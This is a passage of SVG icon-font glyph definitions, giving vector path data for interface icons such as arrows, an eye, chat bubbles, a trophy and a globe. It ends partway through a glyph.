<glyph unicode="&#xe63c;" d="M451.764 480v-512h-30.118v512h30.118zM150.107 449.882h240.941v-240.941h-150.107v-60.236h-210.823v240.941h119.988v60.236zM210.823 208.941h-60.236v150.588h-90.353v-180.706h150.588v30.118zM180.224 419.764v-30.118h0.482v-150.588h180.224v180.706h-180.706z" />
<glyph unicode="&#xe63d;" d="M510.946 214.452c-38.671 98.394-141.161 164.533-254.946 164.533s-216.275-66.139-254.946-164.533c-1.385-3.524-1.385-7.469 0-10.993 38.701-98.425 141.161-164.563 254.946-164.563s216.245 66.108 254.946 164.532c1.415 3.554 1.415 7.469 0 11.023zM256 69.014c-99.328 0-188.808 55.988-224.648 139.927 35.81 83.938 125.29 139.927 224.648 139.927s188.837-55.989 224.648-139.927c-35.84-83.908-125.32-139.927-224.648-139.927zM256 318.66c-60.507 0-109.719-49.212-109.719-109.718s49.212-109.719 109.748-109.719c60.476 0 109.719 49.212 109.719 109.719s-49.243 109.719-109.749 109.719zM256 129.34c-43.911 0-79.631 35.719-79.631 79.601s35.749 79.601 79.631 79.601c43.882 0 79.601-35.719 79.601-79.601s-35.69-79.601-79.601-79.601zM256 249.811c-22.528 0-40.87-18.341-40.87-40.869s18.341-40.87 40.87-40.87 40.87 18.341 40.87 40.87-18.341 40.87-40.87 40.87zM256 198.189c-5.933 0-10.752 4.819-10.752 10.752s4.819 10.752 10.752 10.752 10.752-4.819 10.752-10.752-4.819-10.752-10.752-10.752z" />
<glyph unicode="&#xe63e;" d="M131.283 300.62l-21.624 20.992 146.341 150.739 146.341-150.739-21.625-20.962-109.659 112.941v-324.277h-30.118v324.276l-109.659-112.971zM481.882 208.038v-194.861c0-8.313-6.747-15.059-15.059-15.059h-421.647c-8.313 0-15.059 6.747-15.059 15.059v195.012h-30.117v-195.012c0-24.908 20.269-45.176 45.176-45.176h421.647c24.908 0 45.176 20.269 45.176 45.176v194.861h-30.118z" />
<glyph unicode="&#xe63f;" d="M180.706 26.94v212.119h-30.118v-212.119l-109.809 109.809-21.293-21.293 146.161-146.161 146.191 146.191-21.293 21.293-109.839-109.839zM165.286 12.243h0.692l-0.332-0.361-0.362 0.361zM471.221 311.221l-109.809 109.839v-213.715h-30.118v213.715l-109.809-109.839-21.323 21.323 146.191 146.161 146.191-146.191-21.324-21.293z" />
<glyph unicode="&#xe640;" d="M60.236 148.706h391.529v240.941h-391.529v-240.941zM90.353 359.529h331.294v-180.706h-331.294v180.706zM466.824 449.882h-421.647c-24.907 0-45.176-19.215-45.176-42.858v-305.814c0-23.642 20.269-42.858 45.176-42.858h421.647c24.907 0 45.176 19.215 45.176 42.858v305.815c0 23.642-20.269 42.858-45.176 42.858zM481.882 101.211c0-7.048-6.776-12.74-15.059-12.74h-421.647c-8.282 0-15.059 5.692-15.059 12.74v305.815c0 7.048 6.776 12.74 15.059 12.74h421.647c8.283 0 15.059-5.692 15.059-12.74v-305.815zM150.588 28.236h210.823v-30.118h-210.823v30.118z" />
<glyph unicode="&#xe641;" d="M511.97 449.882h-67.976c0.030 5.060 0.241 9.879 0.241 15.059v15.059h-376.471v-15.059c0-4.819 0.121-10.029 0.15-15.059h-67.885l-0.030-15.029c-0.090-32.708 1.867-66.228 5.873-99.69 10.601-88.455 38.279-190.976 84.179-213.444 5.843-2.892 11.897-4.337 17.95-4.337 7.168 0 14.427 2.048 21.293 6.204l6.294 4.216c25.088-38.46 59.332-64.421 105.351-69.21v-60.476h-88.938v-30.118h210.824v30.118h-91.769v60.145c42.616 4.488 77.854 28.16 105.201 69.632l7.048-4.668c6.505-3.916 13.462-5.843 20.51-5.843 6.053 0 12.168 1.445 18.131 4.367 45.899 22.468 73.577 124.988 84.179 213.444 4.005 33.43 5.963 66.981 5.873 99.689l-0.030 14.999zM120.109 153.705l-6.897-4.638c-3.373-1.988-6.144-2.108-9.879-0.301-23.642 11.596-54.453 80.565-67.554 190.012-3.252 27.106-5.090 54.272-5.541 80.986h38.34c2.921-88.064 15.451-194.801 53.971-269.733l-2.439 3.675zM256 87.236c-136.734 0-156.582 242.447-158.028 362.647h316.055c-1.476-142.185-25.238-362.647-158.028-362.647zM476.22 338.779c-13.132-109.447-43.911-178.417-67.554-190.012-3.704-1.837-6.505-1.747-9.276-0.091l-7.529 5.029-3.493-5.24c32.497 61.38 51.411 152.576 55.145 271.3h38.279c-0.482-26.714-2.319-53.88-5.572-80.986z" />
<glyph unicode="&#xe642;" d="M380.265 276.917l-122.971 200.975-126.826-201.036-135.5 115.441 52.374-394.18h417.28l52.345 393.788-136.704-114.989zM73.698 28.236l-4.005 30.118h372.586l-4.005-30.118h-364.574zM446.284 88.471h-380.567l-30.57 230.009 102.279-87.1 119.476 189.44 115.983-189.5 104.026 87.522-30.63-230.37z" />
<glyph unicode="&#xe643;" d="M512 434.824v-240.007c0-24.908-20.269-45.176-45.176-45.176h-15.3v30.118h15.3c8.313 0 15.059 6.776 15.059 15.059v240.007c0 8.283-6.747 15.059-15.059 15.059h-421.647c-8.313 0-15.059-6.776-15.059-15.059v-240.007c0-8.283 6.746-15.059 15.059-15.059h45.177v-87.1l53.579 47.255 19.908-22.588-103.605-91.407v123.724h-15.059c-24.907 0-45.176 20.269-45.176 45.176v240.007c0 24.907 20.269 45.176 45.176 45.176h421.647c24.907 0 45.176-20.269 45.176-45.176zM422.25 192.678v-91.648c0-24.908-20.269-45.176-45.176-45.176h-15.059v-92.281l-110.442 92.281h-25.69c-24.907 0-45.177 20.269-45.177 45.176v91.648c0 24.908 20.269 45.177 45.177 45.177h151.19c24.908 0 45.176-20.269 45.176-45.177zM392.132 192.678c0 8.283-6.747 15.059-15.059 15.059h-151.19c-8.313 0-15.059-6.776-15.059-15.059v-91.648c0-8.283 6.746-15.059 15.059-15.059h36.653l69.361-58.007v58.007h45.176c8.313 0 15.059 6.776 15.059 15.059v91.648z" />
<glyph unicode="&#xe644;" d="M466.824 480h-421.647c-24.907 0-45.176-20.269-45.176-45.176v-301.176c0-24.908 20.269-45.176 45.176-45.176h15.059v-123.542l141.191 123.543h265.397c24.907 0 45.176 20.269 45.176 45.176v301.176c0 24.908-20.269 45.176-45.176 45.176zM481.882 133.647c0-8.283-6.747-15.059-15.059-15.059h-276.721l-99.749-87.281v87.281h-45.176c-8.313 0-15.059 6.776-15.059 15.059v301.176c0 8.283 6.746 15.059 15.059 15.059h421.647c8.313 0 15.059-6.776 15.059-15.059v-301.176z" />
<glyph unicode="&#xe645;" d="M466.824 480h-421.647c-24.907 0-45.176-20.269-45.176-45.176v-301.176c0-24.908 20.269-45.176 45.176-45.176h15.059v-123.542l141.191 123.543h265.397c24.907 0 45.176 20.269 45.176 45.176v301.176c0 24.908-20.269 45.176-45.176 45.176zM481.882 133.647c0-8.283-6.747-15.059-15.059-15.059h-276.721l-99.749-87.281v87.281h-45.176c-8.313 0-15.059 6.776-15.059 15.059v301.176c0 8.283 6.746 15.059 15.059 15.059h421.647c8.313 0 15.059-6.776 15.059-15.059v-301.176zM90.353 389.647h331.294v-30.118h-331.294v30.118zM90.353 329.412h331.294v-30.118h-331.294v30.118zM90.353 269.177h180.706v-30.118h-180.706v30.118z" />
<glyph unicode="&#xe646;" d="M277.293 224l200.162-200.162-21.293-21.293-200.162 200.162-200.162-200.162-21.293 21.293 200.162 200.162-200.192 200.162 21.293 21.293 200.192-200.162 200.162 200.162 21.293-21.293-200.162-200.162z" />
<glyph unicode="&#xe647;" d="M362.044 352.482v-255.94h-30.118v255.94c0 32.858-24.064 68.247-76.921 68.247-58.459 0-74.060-42.888-74.060-68.247v-244.585h0.211v-43.882c0-18.673 20.871-36.322 42.948-36.322 25.419 0 47.194 20.57 47.194 37.376v8.132h-0.091l0.241 229.406c0 26.323-7.439 26.323-14.035 26.323-11.113 0-16.475-1.054-16.475-24.787v-154.986h-30.118v154.986c0 13.583 0 54.904 46.592 54.904 20.149 0 44.152-9.788 44.152-56.471l-0.211-193.656h0.060v-43.882c0-35.328-36.864-67.493-77.312-67.493-38.912 0-73.065 31.051-73.065 66.44v2.228h-0.211v286.268c0 47.375 32.588 98.364 104.177 98.364 70.264-0.030 107.038-49.483 107.038-98.364z" />
<glyph unicode="&#xe648;" d="M492.544 121.721l-21.293-21.293-215.251 215.221-215.22-215.221-21.293 21.293 236.514 236.514 236.544-236.514z" />
<glyph unicode="&#xe649;" d="M397.764 224.844l-236.544-236.544-21.293 21.293 215.22 215.22-215.22 215.281 21.293 21.293 236.544-236.544z" />
<glyph unicode="&#xe64a;" d="M156.822 224.874l215.221-215.251-21.293-21.293-236.514 236.544 236.544 236.514 21.293-21.293-215.251-215.221z" />
<glyph unicode="&#xe64b;" d="M492.544 327.153l-236.574-236.544-236.514 236.544 21.293 21.293 215.19-215.221 215.281 215.251 21.324-21.323z" />
<glyph unicode="&#xe64c;" d="M464.354 426.572l-266.029-406.137-148.119 132.096 20.058 22.468 122.007-108.845 246.905 376.923 25.178-16.505z" />
<glyph unicode="&#xe64d;" d="M421.647 306.492h30.118v-308.375h-421.647v421.647h252.777v-30.118h-222.66v-361.412h361.412v278.257zM146.191 234.661l-21.323-21.324 103.424-103.424 228.502 346.714-25.148 16.595-208.173-315.874-77.282 77.312z" />
<glyph unicode="&#xe64e;" d="M179.441 389.647v30.118h-87.823v-30.118h-91.618v-361.412h512v361.412h-332.559zM481.882 58.353h-451.764v210.824h197.482c-10.391-17.8-16.775-38.22-16.775-60.236 0-66.44 54.031-120.471 120.471-120.471s120.471 54.031 120.471 120.471c0 22.016-6.385 42.436-16.776 60.236h46.893v-210.823zM421.647 208.941c0-49.815-40.538-90.353-90.353-90.353s-90.353 40.538-90.353 90.353 40.538 90.353 90.353 90.353 90.353-40.538 90.353-90.353zM410.142 299.294c-21.203 18.492-48.55 30.118-78.848 30.118s-57.645-11.625-78.848-30.118h-222.328v60.236h451.764v-60.236h-71.74z" />
<glyph unicode="&#xe64f;" d="M496.007 413.079h-58.036c-8.794 0-15.993-7.048-15.993-15.692v-20.089l-331.144-121.374v8.132c0 12.951-10.782 23.522-24.004 23.522h-42.828c-13.222 0-24.004-10.572-24.004-23.522v-141.192c0-12.921 10.782-23.522 24.004-23.522h42.828c13.192 0 24.004 10.601 24.004 23.522v9.969l31.142-5.692c-0.692-4.909-1.144-9.819-1.144-14.788 0-57.133 47.013-103.635 104.779-103.635 49.905 0 91.257 33.973 101.798 80.776l94.57-17.348v-19.848c0-8.644 7.198-15.692 15.993-15.692h58.036c8.795 0 15.993 7.048 15.993 15.692v345.088c0 8.644-7.198 15.692-15.993 15.692zM225.612 38.837c-41.171 0-74.662 32.979-74.662 73.517 0 3.132 0.813 6.174 1.204 9.276l145.769-26.745c-7.951-32.587-37.195-56.049-72.313-56.049zM481.882 66.726h-29.786v30.509l-391.379 71.77v-39.514h-30.599v128h30.599v-44.695l391.379 143.45v26.715h29.786v-316.236z" />
<glyph unicode="&#xe650;" d="M479.262 426.331l-195.764-286.118-24.847 16.986 195.764 286.118 24.847-16.986zM271.059 58.594c0-33.22-27.016-60.236-60.236-60.236-6.114 0-16.203-0.452-16.293-0.452h-164.262l137.125 103.334c4.518 3.132 25.871 17.589 43.429 17.589 33.22 0 60.235-27.015 60.235-60.236zM240.941 58.594c0 16.595-13.523 30.118-30.118 30.118-5.27 0-17.529-6.114-25.691-11.836l-64.844-48.881h73.276c1.898 0.091 11.324 0.482 17.257 0.482 16.595 0 30.118 13.523 30.118 30.118z" />
<glyph unicode="&#xe651;" d="M210.823 88.471v45.176h30.118v-15.059h30.117v15.059h30.118v-45.176h-90.353zM512 148.706h-30.118v-180.706h-451.764v180.706h-30.117v240.941h108.906c28.25 55.115 84.48 90.353 147.094 90.353s118.875-35.268 147.095-90.353h108.905v-240.941zM143.631 389.647h224.798c-24.847 37.135-66.56 60.236-112.399 60.236s-87.552-23.13-112.399-60.236zM451.764 148.706h-391.529v-150.588h391.529v150.588zM481.882 359.529h-451.764v-180.706h451.764v180.706z" />
<glyph unicode="&#xe652;" d="M431.074 419.404h-215.401l-70.204-211.245h50.176l-60.536-182.272 285.606 242.477h-87.462l97.822 151.040zM338.733 238.245l-141.161-119.838 39.815 119.838h-50.146l50.146 151.040h138.3l-97.822-151.040h60.868z" />
<glyph unicode="&#xe653;" d="M356.292 239.059l-115.23-217.841-26.624 14.065 91.859 173.659h-153.871l147.576 219.226 24.967-16.836-115.983-172.273h147.305z" />
<glyph unicode="&#xe654;" d="M271.059 419.764v60.236h-30.118v-60.236h-210.823v-301.176h451.764v301.176h-210.823zM451.764 148.706h-391.529v240.941h391.529v-240.941zM105.412 88.471h301.176v-30.118h-77.824l45.297-70.053-25.299-16.354-55.868 86.408h-21.836v-90.353h-30.118v90.353h-21.444l-56.29-86.438-25.238 16.414 45.598 70.024h-78.156v30.118z" />
<glyph unicode="&#xe655;" d="M391.529 359.529v72.101c0 26.654-22.197 48.369-49.483 48.369h-171.641c-27.256 0-49.453-21.715-49.453-48.369v-72.101h-90.835v-391.529h451.764v391.529h-90.353zM151.070 431.631c0 10.060 8.674 18.252 19.335 18.252h171.641c10.692 0 19.365-8.192 19.365-18.252v-72.101h-210.341v72.101zM451.764-1.882h-391.529v240.941h391.529v-240.941zM451.764 269.177h-391.529v60.236h60.717v-19.365h30.117v19.365h210.341v-19.365h30.118v19.365h60.236v-60.236z" />
<glyph unicode="&#xe656;" d="M409.69 138.195l-21.263 21.324 49.514 49.423h-166.882v-166.882l49.423 49.514 21.324-21.263-85.805-85.986-85.805 85.986 21.323 21.263 49.423-49.514v166.882h-166.882l49.513-49.423-21.263-21.324-85.986 85.805 85.986 85.805 21.263-21.324-49.513-49.423h166.882v166.882l-49.423-49.514-21.323 21.263 85.805 85.986 85.805-85.986-21.324-21.263-49.423 49.514v-166.882h166.882l-49.514 49.423 21.263 21.324 85.986-85.805-85.986-85.805z" />
<glyph unicode="&#xe657;" d="M350.63 116.691l21.564-21.022-116.194-119.115-116.194 119.085 21.564 21.022 79.571-81.529v377.736l-79.571-81.558-21.564 21.052 116.194 119.085 116.194-119.085-21.564-21.022-79.571 81.529v-377.765l79.571 81.589z" />
<glyph unicode="&#xe658;" d="M503.447 224l-119.085-116.194-21.022 21.564 81.529 79.571h-377.736l81.558-79.571-21.022-21.564-119.115 116.194 119.085 116.194 21.022-21.564-81.528-79.571h377.765l-81.558 79.571 21.022 21.564 119.085-116.194z" />
<glyph unicode="&#xe659;" d="M481.762 138.104l0.12-139.987-140.017 0.12 0.030 30.118 88.546-0.091-174.441 174.411-174.441-174.442 88.546 0.091 0.030-30.118-140.017-0.091 0.12 140.017 30.117-0.030-0.090-88.516 174.441 174.411-174.441 174.442 0.090-88.516-30.117-0.030-0.12 139.987 140.017-0.12-0.030-30.118-88.546 0.091 174.441-174.442 174.441 174.442-88.546-0.091-0.030 30.118 140.017 0.12-0.12-140.017-30.118 0.030 0.091 88.516-174.441-174.411 174.442-174.442-0.091 88.516 30.118 0.030z" />
<glyph unicode="&#xe65a;" d="M481.882 449.973v-271.149h-30.118v219.768l-310.724-310.121-21.293 21.324 310.663 310.061h-220.34v30.118h271.812z" />
<glyph unicode="&#xe65b;" d="M370.206 88.471l-310.724 310.122v-219.768h-30.117v271.149h271.812v-30.118h-220.34l310.663-310.061-21.293-21.324z" />
<glyph unicode="&#xe65c;" d="M256 305.529l131.132-131.132-21.293-21.293-109.839 109.839-109.809-109.809-21.293 21.293 131.102 131.102zM512 224c0-141.161-114.839-256-256-256s-256 114.839-256 256 114.838 256 256 256 256-114.839 256-256zM481.882 224c0 124.567-101.316 225.882-225.882 225.882s-225.882-101.316-225.882-225.882 101.316-225.882 225.882-225.882 225.882 101.316 225.882 225.882z" />
<glyph unicode="&#xe65d;" d="M206.427 355.132l131.102-131.132-131.132-131.132-21.293 21.293 109.839 109.839-109.839 109.809 21.323 21.324zM512 224c0-141.161-114.839-256-256-256s-256 114.839-256 256 114.838 256 256 256 256-114.839 256-256zM481.882 224c0 124.567-101.316 225.882-225.882 225.882s-225.882-101.316-225.882-225.882 101.316-225.882 225.882-225.882 225.882 101.316 225.882 225.882z" />
<glyph unicode="&#xe65e;" d="M326.897 333.809l-109.839-109.809 109.809-109.809-21.293-21.293-131.102 131.102 131.132 131.132 21.293-21.324zM512 224c0-141.161-114.839-256-256-256s-256 114.839-256 256 114.838 256 256 256 256-114.839 256-256zM481.882 224c0 124.567-101.316 225.882-225.882 225.882s-225.882-101.316-225.882-225.882 101.316-225.882 225.882-225.882 225.882 101.316 225.882 225.882z" />
<glyph unicode="&#xe65f;" d="M365.809 294.897l21.293-21.293-131.102-131.132-131.132 131.102 21.293 21.293 109.839-109.809 109.809 109.839zM512 224c0-141.161-114.839-256-256-256s-256 114.839-256 256 114.838 256 256 256 256-114.839 256-256zM481.882 224c0 124.567-101.316 225.882-225.882 225.882s-225.882-101.316-225.882-225.882 101.316-225.882 225.882-225.882 225.882 101.316 225.882 225.882z" />
<glyph unicode="&#xe660;" d="M256 297.096l206.427-206.427-21.293-21.293-185.133 185.133-185.103-185.103-21.293 21.293 206.396 206.396zM256 400.369l185.103-185.103 21.293 21.293-206.396 206.427-206.427-206.427 21.323-21.293 185.103 185.103z" />
<glyph unicode="&#xe661;" d="M290.454 224l-206.427-206.427-21.293 21.293 185.103 185.133-185.103 185.103 21.293 21.324 206.427-206.427zM229.918 430.426l-21.293-21.323 185.103-185.103-185.103-185.103 21.293-21.293 206.396 206.396-206.396 206.427z" />
<glyph unicode="&#xe662;" d="M240.549 224l185.103-185.103-21.293-21.293-206.396 206.396 206.427 206.427 21.293-21.293-185.133-185.133zM279.793 409.133l-21.293 21.293-206.427-206.426 206.427-206.427 21.293 21.293-185.103 185.133 185.103 185.133z" />
<glyph unicode="&#xe663;" d="M256 159.428l-206.427 206.427 21.293 21.293 185.133-185.103 185.103 185.103 21.293-21.293-206.396-206.426zM256 56.124l-185.103 185.133-21.323-21.293 206.427-206.427 206.427 206.427-21.293 21.293-185.133-185.133z" />
<glyph unicode="&#xe664;" d="M291.147 480h-230.912v-512h391.529v352.135l-160.618 159.865zM301.176 427.535l98.575-98.123h-98.575v98.123zM90.353-1.882v451.764h90.353v-30.118h30.118v30.118h60.235v-150.588h150.588v-301.176h-331.294zM150.588 239.059h30.118v-30.117h-30.118v30.118zM180.706 239.059v30.118h30.118v-30.118h-30.118zM180.706 299.294v30.118h30.118v-30.118h-30.118zM150.588 299.294h30.118v-30.117h-30.118v30.117zM150.588 359.529h30.118v-30.117h-30.118v30.117zM180.706 359.529v30.118h30.118v-30.118h-30.118zM150.588 419.764h30.118v-30.118h-30.118v30.118zM180.706 197.226c-33.22 0-60.236-27.015-60.236-60.236s27.016-60.236 60.236-60.236c1.868 0 3.644 0.211 6.596 0.603 19.456 2.139 36.684 13.704 46.11 30.901 5 9.125 7.53 18.793 7.53 28.732 0 33.22-27.016 60.236-60.236 60.236zM206.999 122.684c-4.698-8.584-13.282-14.366-22.95-15.42l-3.373-0.421c-16.595 0-30.088 13.523-30.088 30.118s13.523 30.118 30.118 30.118 30.118-13.523 30.118-30.118c0-4.788-1.295-9.608-3.825-14.276z" />
<glyph unicode="&#xe665;" d="M256.482 480c-141.161 0-256-114.839-256-256s114.838-256 256-256 256 114.839 256 256-114.868 256-256 256zM31.352 208.941h88.456c1.325-30.841 6.355-61.169 15.451-90.353h-78.396c-14.486 27.286-23.371 57.916-25.509 90.353zM119.808 239.059h-88.456c2.139 32.436 11.023 63.066 25.51 90.353h78.306c-9.066-29.184-14.065-59.512-15.36-90.353zM167.063 329.412h177.573c9.939-29.064 15.721-59.392 17.137-90.353h-211.847c1.386 30.961 7.198 61.29 17.137 90.353zM149.925 208.941h211.877c-1.476-30.961-7.259-61.289-17.228-90.353h-177.423c-9.969 29.063-15.781 59.392-17.227 90.353zM391.921 208.941h89.69c-2.139-32.437-11.023-63.067-25.51-90.353h-79.631c9.096 29.184 14.125 59.512 15.45 90.353zM391.921 239.059c-1.295 30.84-6.295 61.169-15.36 90.353h79.541c14.457-27.286 23.341-57.916 25.51-90.353h-89.69zM436.766 359.529h-70.897c-11.806 28.763-27.588 55.959-46.683 81.317 47.526-13.764 88.486-42.767 117.579-81.317zM273.288 449.039c24.817-27.015 44.695-57.224 59.392-89.51h-153.66c14.667 32.256 34.515 62.434 59.332 89.45 5.994 0.452 11.987 0.904 18.131 0.904 5.662 0 11.234-0.452 16.805-0.844zM192.241 440.456c-18.944-25.239-34.666-52.315-46.381-80.926h-69.692c28.763 38.159 69.18 66.981 116.074 80.926zM76.168 88.471h69.782c11.776-28.642 27.558-55.748 46.592-80.986-47.013 13.884-87.552 42.737-116.374 80.986zM238.713-0.979c-24.877 27.015-44.815 57.194-59.572 89.45h153.419c-14.757-32.286-34.695-62.494-59.603-89.51-5.452-0.392-10.933-0.844-16.474-0.844-6.024 0-11.897 0.452-17.769 0.904zM318.856 7.063c19.155 25.359 35.057 52.615 46.893 81.408h71.017c-29.154-38.641-70.234-67.674-117.911-81.408z" />
<glyph unicode="&#xe666;" d="M328.313 92.988l29.425-6.415c-15.209-69.813-75.625-118.573-146.914-118.573-83.034 0-150.588 67.554-150.588 150.588 0 68.367 46.11 128.271 112.188 145.649l7.65-29.124c-52.827-13.915-89.721-61.831-89.721-116.525 0-66.44 54.031-120.471 120.471-120.471 57.013 0 105.321 39.002 117.489 94.87zM481.882 24.591v-30.118h-56.26l-28.762 124.024h-185.464l-16.384 243.411c-25.51 7.017-44.423 30.148-44.423 57.856 0 33.22 27.016 60.236 60.236 60.236s60.236-27.015 60.236-60.236c0-28.25-19.577-51.803-45.809-58.308l8.132-120.802 109.388 27.136 7.228-29.244-114.597-28.401 4.156-61.5h181.248l28.762-124.024h32.316zM210.823 389.647c16.625 0 30.118 13.523 30.118 30.118s-13.493 30.118-30.118 30.118-30.118-13.523-30.118-30.118 13.493-30.118 30.118-30.118z" />
<glyph unicode="&#xe667;" d="M0 480v-120.471h512v120.471h-512zM481.882 389.647h-451.764v60.236h451.764v-60.236zM0 178.824h512v120.471h-512v-120.471zM30.117 269.177h451.764v-60.236h-451.764v60.236zM0-1.882h512v120.471h-512v-120.471zM30.117 88.471h451.764v-60.236h-451.764v60.236z" />
<glyph unicode="&#xe668;" d="M150.588 480v-120.471h361.412v120.471h-361.412zM481.882 389.647h-301.176v60.236h301.176v-60.236zM150.588 178.824h361.412v120.471h-361.412v-120.471zM180.706 269.177h301.176v-60.236h-301.176v60.236zM150.588-1.882h361.412v120.471h-361.412v-120.471zM180.706 88.471h301.176v-60.236h-301.176v60.236zM0 359.529h120.471v120.471h-120.471v-120.471zM30.117 449.882h60.236v-60.236h-60.236v60.236zM0 178.824h120.471v120.471h-120.471v-120.471zM30.117 269.177h60.236v-60.236h-60.236v60.236zM0-1.882h120.471v120.471h-120.471v-120.471zM30.117 88.471h60.236v-60.236h-60.236v60.236z" />
<glyph unicode="&#xe669;" d="M0 269.177h210.823v210.823h-210.823v-210.823zM30.117 449.882h150.588v-150.588h-150.588v150.588zM301.176 480v-210.823h210.824v210.823h-210.823zM481.882 299.294h-150.588v150.588h150.588v-150.588zM0-32h210.823v210.823h-210.823v-210.823zM30.117 148.706h150.588v-150.588h-150.588v150.588zM301.176-32h210.824v210.823h-210.823v-210.823zM331.294 148.706h150.588v-150.588h-150.588v150.588z" />
<glyph unicode="&#xe66a;" d="M210.823 359.529h30.118v-60.236h-30.118v30.118h-60.236v-240.941h30.118v-30.118h-90.353v30.118h30.117v240.941h-60.236v-30.118h-30.117v60.236h180.706zM451.764 359.529h-180.706v-60.236h30.118v30.118h60.236v-240.941h-30.118v-30.118h90.353v30.118h-30.118v240.941h60.236v-30.118h30.118v60.236h-30.118z" />
<glyph unicode="&#xe66b;" d="M512-1.882v-30.118h-512v30.118h512zM240.911 428.559v-340.088h30.118v340.149l109.839-109.839 21.293 21.293-146.161 146.161-146.191-146.161 21.293-21.293 109.809 109.779z" />
<glyph unicode="&#xe66c;" d="M451.764 449.882v-30.118h-30.118v-194.53c0-91.317-74.3-165.647-165.647-165.647s-165.647 74.33-165.647 165.647v194.53h-30.117v30.118h90.353v-30.118h-30.118v-194.53c0-74.722 60.808-135.529 135.529-135.529s135.529 60.808 135.529 135.53v194.53h-30.118v30.118h90.353zM60.236-1.882h391.529v30.118h-391.529v-30.118z" />
<glyph unicode="&#xe66d;" d="M512 389.647h-331.294v-90.353h-86.528l-35.84-120.47h-58.338v-149.896h60.295c0-0.241-0.060-0.452-0.060-0.692 0-33.22 27.016-60.236 60.236-60.236s60.236 27.015 60.236 60.236c0 0.241-0.060 0.452-0.060 0.692h150.739c-0.030-0.241-0.091-0.452-0.091-0.692 0-33.22 27.015-60.236 60.236-60.236s60.236 27.015 60.236 60.236c0 0.241-0.060 0.452-0.060 0.692h60.296v360.719zM116.645 269.177h64.060v-90.353h-90.956l26.895 90.353zM120.471-1.882c-16.595 0-30.117 13.523-30.117 30.118s13.523 30.118 30.118 30.118 30.118-13.523 30.118-30.118-13.523-30.118-30.118-30.118zM391.529-1.882c-16.595 0-30.118 13.523-30.118 30.118s13.523 30.118 30.118 30.118 30.118-13.523 30.118-30.118-13.523-30.118-30.118-30.118zM481.882 59.046h-38.882c-10.541 17.529-29.546 29.425-51.471 29.425s-40.93-11.897-51.471-29.425h-168.117c-10.541 17.529-29.546 29.425-51.471 29.425s-40.93-11.897-51.471-29.425h-38.882v89.66h180.706v210.823h271.059v-300.484z" />
<glyph unicode="&#xe66e;" d="M271.059 419.012v30.87h45.176v30.118h-120.471v-30.118h45.177v-30.87c-117.519-7.83-210.823-105.652-210.823-225.13 0-124.567 101.316-225.882 225.882-225.882s225.882 101.316 225.882 225.882c0 119.476-93.305 217.299-210.824 225.13zM256-1.882c-107.942 0-195.764 87.823-195.764 195.764s87.823 195.764 195.764 195.764 195.764-87.823 195.764-195.764-87.823-195.764-195.764-195.764zM271.059 208.941h120.471v-30.118h-150.588v120.471h30.117v-90.353z" />
<glyph unicode="&#xe66f;" d="M286.118 449.882v-15.059c0-16.625-13.523-30.118-30.118-30.118s-30.118 13.493-30.118 30.118v15.059h-105.412v-451.764h105.412v15.059c0 16.625 13.523 30.118 30.118 30.118s30.118-13.493 30.118-30.118v-15.059h105.412v451.764h-105.412zM197.662 419.764c6.716-25.932 30.328-45.177 58.338-45.177s51.621 19.245 58.338 45.177h47.074v-180.706h-210.823v180.706h47.074zM314.338 28.236c-6.686 25.932-30.298 45.176-58.338 45.176s-51.621-19.245-58.338-45.176h-47.074v180.706h210.824v-180.706h-47.074z" />
<glyph unicode="&#xe670;" d="M462.848 187.106c2.5-6.114 3.976-14.035 3.976-24.305 0-15.842-7.228-29.244-18.703-37.135 4.156-7.048 6.144-15.089 6.144-23.13 0-16.926-9.427-31.353-23.642-38.791 2.409-5.662 3.825-12.649 3.885-21.233 0.060-13.523-3.885-24.396-11.776-32.316-8.313-8.342-20.089-12.589-34.966-12.589h-169.412c-22.708 0-38.34 12.168-49.785 21.082-6.596 5.12-12.83 9.999-17.167 9.999h-63.308c-8.313 0-15.059 6.747-15.059 15.059s6.746 15.059 15.059 15.059h63.308c14.667 0 25.811-8.674 35.66-16.324 9.728-7.56 18.914-14.728 31.292-14.728h169.412c6.385 0 11.234 1.295 13.613 3.704 2.048 2.048 3.072 5.723 3.042 10.902-0.091 13.161-2.771 15.993-30.931 15.993h-3.192c-8.313 0-15.059 6.747-15.059 15.059s6.747 15.059 15.059 15.059h37.888c9.246 0 15.962 5.933 15.962 14.095 0 13.553-13.523 15.571-21.594 15.571h-22.588c-8.313 0-15.059 6.747-15.059 15.059s6.747 15.059 15.059 15.059h43.279c9.969 0 13.493 7.529 13.493 14.577 0 14.818 0 14.818-13.221 15.209-1.536 0.030-3.132 0.151-4.699 0.211h-32.406c-8.313 0-15.059 6.747-15.059 15.059s6.747 15.059 15.059 15.059h29.575c0.211 0 0.392 0.12 0.603 0.12h19.004c8.885 0 16.143 6.837 16.143 15.209s-7.228 15.209-16.143 15.209h-134.114c-4.488 0-8.734 1.988-11.596 5.452-2.861 3.464-4.036 8.012-3.192 12.409l15.661 82.341c1.868 8.222 7.168 31.533 0.994 41.863-1.596 2.68-5.481 5.542-10.24 5.542 0 0 0 0 0 0-5.903 0-11.957-4.729-17.046-13.252l-97.612-157.636c-2.74-4.428-7.589-7.138-12.8-7.138h-77.372c-8.313 0-15.059 6.747-15.059 15.059s6.746 15.059 15.059 15.059h68.999l93.004 150.287c14.336 24.094 32.979 27.738 42.767 27.738 0 0 0 0 0.030 0 14.607 0 28.762-7.951 36.081-20.209 10.963-18.341 7.168-43.52 2.62-63.428l-12.137-63.97h115.923c25.51 0 46.26-20.329 46.26-45.327 0.030-14.998-7.469-28.341-18.974-36.593z" />
<glyph unicode="&#xe671;" d="M438.754 193.852c0-8.313-6.747-15.059-15.059-15.059h-69l-93.003-150.287c-14.366-24.094-32.979-27.738-42.767-27.738 0 0-0.030 0-0.030 0-14.607 0-28.762 7.951-36.111 20.209-10.963 18.372-7.168 43.55-2.62 63.428l12.137 63.97h-115.923c-25.51 0-46.23 20.329-46.23 45.327 0 16.505 9.035 30.991 22.528 38.912-4.608 6.294-7.529 13.703-7.529 21.956 0 15.842 7.228 29.244 18.703 37.135-4.156 7.077-6.144 15.119-6.144 23.161 0 17.317 9.878 31.985 24.606 39.303-4.005 7.71-4.879 15.541-4.879 20.781 0 28.070 17.499 44.815 46.773 44.815h169.412c22.709 0 38.37-12.168 49.784-21.082 6.596-5.12 12.83-9.999 17.137-9.999h63.337c8.313 0 15.059-6.746 15.059-15.059s-6.747-15.059-15.059-15.059h-63.337c-14.668 0-25.811 8.674-35.659 16.324-9.698 7.62-18.884 14.757-31.262 14.757h-169.412c-14.065 0-16.655-4.969-16.655-14.697 0-4.759 0-15.872 